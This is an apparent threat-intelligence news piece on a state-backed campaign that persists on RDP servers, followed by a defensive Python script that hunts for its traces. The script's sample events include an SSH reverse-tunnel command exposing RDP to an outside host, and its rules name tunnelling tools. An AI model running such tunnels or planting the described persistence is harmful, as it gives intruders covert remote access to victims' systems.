Threat Intel - APT Hackers Target RDP Servers for Persistence
In short: a state-backed hacking group is using a fake Microsoft Office installer to get into important computer systems and stay hidden for a long time.
APT-C-13 hackers are targeting RDP servers to deploy malicious payloads. This stealthy campaign poses significant risks to critical infrastructure and government agencies. Organizations must act quickly to protect their networks from these persistent threats.
The Threat
APT-C-13, a notorious state-backed hacking group, is actively targeting Remote Desktop Protocol (RDP) servers. This group, also known as Sandworm, APT44, Seashell Blizzard, and Voodoo Bear, has been conducting cyber operations since at least 2009. Their latest campaign marks a significant shift in strategy, moving from destructive attacks to stealthy, long-term infiltrations aimed at harvesting sensitive intelligence over extended periods.
The hackers are using a disguised ISO image named Microsoft.Office.2025x64.v2025.iso, distributed through Telegram channels and software cracking communities. When victims attempt to install what appears to be Microsoft Office, a hidden loader launches in the background and starts the attack chain. This social engineering tactic exploits the trust users place in familiar software names, making it an effective entry point for the attackers.
Who's Behind It
APT-C-13's approach has evolved significantly. Analysts from the 360 Threat Intelligence Center have observed a transition from “instantaneous disruption” to “intelligence-driven persistent parasitism.” This evolution is evident in their use of a modular penetration framework known as the Tambur/Sumbur/Kalambur series. Their operations are designed to remain undetected for months, allowing them to extract sensitive data from within trusted environments.
One confirmed victim was a technician at a Ukrainian state-owned shipbuilding plant, highlighting the campaign's serious implications for critical infrastructure. The attackers have established deep access, often remaining unnoticed until they have achieved their objectives, which can have devastating consequences for organizations.
Tactics & Techniques
The most alarming aspect of this campaign is how the attackers maintain persistence. They plant scheduled tasks named “Tambur” and “Protector” under a task path that mimics a native Windows component, so the tasks blend in with the many legitimate Microsoft tasks on a host. The tasks run with full administrator privileges, and a hardcoded password keeps the attackers' RDP logins working without interruption.
Command-and-control traffic is routed through the Tor network, obscuring the operators' real location. An SSH reverse tunnel maps the victim's RDP port to an attacker-controlled server, allowing silent logins from anywhere in the world; because the tunnelled connection is handed to the RDP service by the local SSH client, such logons show a loopback source address in the Windows Security log rather than an external one. The Sumbur module disguises its activity as legitimate Microsoft Edge updates, while the DemiMur module installs a forged root certificate into the system's trusted root store, so payloads that chain to it pass Windows' trust checks.
Defensive Measures
Organizations must take immediate action to safeguard against these threats. Blocking unauthorized ISO images and third-party activation tools is crucial, as these are the campaign's delivery channels. Host and internal network behaviour should be monitored for signs of tampering, such as unusual scheduled task creation or registry modifications.
Endpoint security solutions should be kept up to date, with regular comprehensive scans. Key institutions must strengthen internal auditing practices and establish detection rules that target the anomalous RDP and SSH activity seen here: RDP logons (Security event 4624, logon type 10) arriving from a loopback address, ssh.exe launched with a reverse-forward (-R) argument that exposes port 3389, new scheduled tasks (event 4698) created under the Microsoft\Windows task folders that run elevated from outside the Windows directory, and new entries in the machine's trusted root certificate store. By implementing these measures, organizations can better protect themselves from long-term intelligence theft and the severe implications of such attacks.
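As an added example (not code from the report or from 360 Threat Intelligence Center), the following Python script turns the tradecraft in the Tactics & Techniques section and the detection rules called for here into four hunt rules over Windows Security and Sysmon events represented as plain dicts. The sample events are constructed for the example; the task names Tambur and Protector come from the report, while plink.exe as a second tunnelling binary, the exact field names, the sample paths and the certificate thumbprint are assumptions.

```python
"""Hunt rules for RDP-persistence tradecraft: scheduled-task persistence,
tunnelled RDP logons, SSH reverse tunnels and root-store writes, run over
constructed Windows Security / Sysmon events shaped as plain dicts."""
import re
import xml.etree.ElementTree as ET
from ipaddress import ip_address

SUSPICIOUS_TASK_NAMES = {"tambur", "protector"}   # task names reported in the campaign
MIMIC_TASK_PATH = "\\microsoft\\windows\\"         # folder used to pass as a Windows component
SYSTEM_PREFIXES = ("c:\\windows\\", "%systemroot%", "%windir%")
ROOT_STORE_KEY = "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\"
TUNNEL_IMAGES = ("\\ssh.exe", "\\plink.exe")       # plink.exe is an assumption, not in the report


def rule_tunnelled_rdp_logon(ev):
    """4624 type 10 (RemoteInteractive) from a loopback source: RDP arrived through
    a local port forward such as an SSH -R tunnel rather than from the network."""
    if ev.get("EventID") != 4624 or ev.get("LogonType") != "10":
        return None
    try:
        if ip_address(ev.get("IpAddress", "")).is_loopback:
            return f"RDP logon for {ev['TargetUserName']} from loopback {ev['IpAddress']}"
    except ValueError:          # 4624 records '-' when no address applies
        pass
    return None


def rule_task_persistence(ev):
    """4698 task created: a known campaign name, or an elevated task parked under
    \\Microsoft\\Windows whose executable lives outside the Windows directory."""
    if ev.get("EventID") != 4698:
        return None
    path = ev["TaskName"]
    name = path.rsplit("\\", 1)[-1]
    if name.lower() in SUSPICIOUS_TASK_NAMES:
        return f"scheduled task with campaign name {path}"
    task = ET.fromstring(ev["TaskContent"])        # task XML is namespaced; {*} ignores it
    runlevel = task.findtext(".//{*}RunLevel") or ""
    command = task.findtext(".//{*}Command") or ""
    elevated = runlevel == "HighestAvailable" or task.findtext(".//{*}UserId") == "S-1-5-18"
    if (path.lower().startswith(MIMIC_TASK_PATH) and elevated
            and not command.lower().startswith(SYSTEM_PREFIXES)):
        return f"elevated task {path} runs {command} from outside the Windows directory"
    return None


def rule_reverse_tunnel(ev):
    """Sysmon 1 process creation: ssh/plink started with -R exposing port 3389."""
    if ev.get("EventID") != 1 or not ev.get("Image", "").lower().endswith(TUNNEL_IMAGES):
        return None
    m = re.search(r"(?:^|\s)-R\s*(\S+)", ev.get("CommandLine", ""))
    if m and ":3389" in m.group(1):
        return f"{ev['Image']} reverse-forwards RDP: {m.group(1)}"
    return None


def rule_root_store_write(ev):
    """Sysmon 13 registry value set under the machine ROOT store: a new trusted root
    was installed. Legitimate installers should be allowlisted against a baseline."""
    if ev.get("EventID") != 13 or not ev.get("TargetObject", "").startswith(ROOT_STORE_KEY):
        return None
    thumb = ev["TargetObject"][len(ROOT_STORE_KEY):].split("\\", 1)[0]
    return f"{ev['Image']} wrote root certificate {thumb} to the machine ROOT store"


RULES = (rule_tunnelled_rdp_logon, rule_task_persistence, rule_reverse_tunnel, rule_root_store_write)


def hunt(events):
    """Return (rule name, detail) for every event that trips a rule."""
    findings = []
    for ev in events:
        for rule in RULES:
            detail = rule(ev)
            if detail:
                findings.append((rule.__name__, detail))
    return findings


# Minimal task XML in the Task Scheduler schema; the command is filled in per sample.
TASK_XML = ('<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
            '<Principals><Principal><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel>'
            '</Principal></Principals><Actions><Exec><Command>{cmd}</Command></Exec></Actions></Task>')

SAMPLE_EVENTS = [  # constructed for this example, not real telemetry
    {"EventID": 4624, "LogonType": "10", "TargetUserName": "svc_backup", "IpAddress": "10.20.0.15"},
    {"EventID": 4624, "LogonType": "10", "TargetUserName": "svc_backup", "IpAddress": "127.0.0.1"},
    {"EventID": 4698, "TaskName": "\\Microsoft\\Windows\\Tambur",
     "TaskContent": TASK_XML.format(cmd="C:\\ProgramData\\Edge\\update.exe")},
    {"EventID": 4698, "TaskName": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
     "TaskContent": TASK_XML.format(cmd="%windir%\\system32\\defrag.exe")},
    {"EventID": 4698, "TaskName": "\\Microsoft\\Windows\\Maintenance\\Helper",
     "TaskContent": TASK_XML.format(cmd="C:\\Users\\Public\\helper.exe")},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\OpenSSH\\ssh.exe",
     "CommandLine": "ssh.exe -N -R 0.0.0.0:50022:127.0.0.1:3389 -i key tunnel@198.51.100.7"},
    {"EventID": 13, "Image": "C:\\ProgramData\\Edge\\update.exe",
     "TargetObject": ROOT_STORE_KEY + "A1B2C3D4E5F60718293A4B5C6D7E8F9012345678\\Blob"},
]

if __name__ == "__main__":
    for rule, detail in hunt(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

Run against the constructed sample, the script flags the loopback RDP logon, the Tambur task, the elevated helper task running from C:\Users\Public, the ssh.exe reverse forward of port 3389 and the root-store write, while the genuine ScheduledDefrag task and the RDP logon from an internal address pass. In production the event dicts would come from a SIEM export or Get-WinEvent, and the root-store rule should be paired with a baseline of known thumbprints so that sanctioned enterprise CAs are not reported every time they are deployed.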
Cyber Security News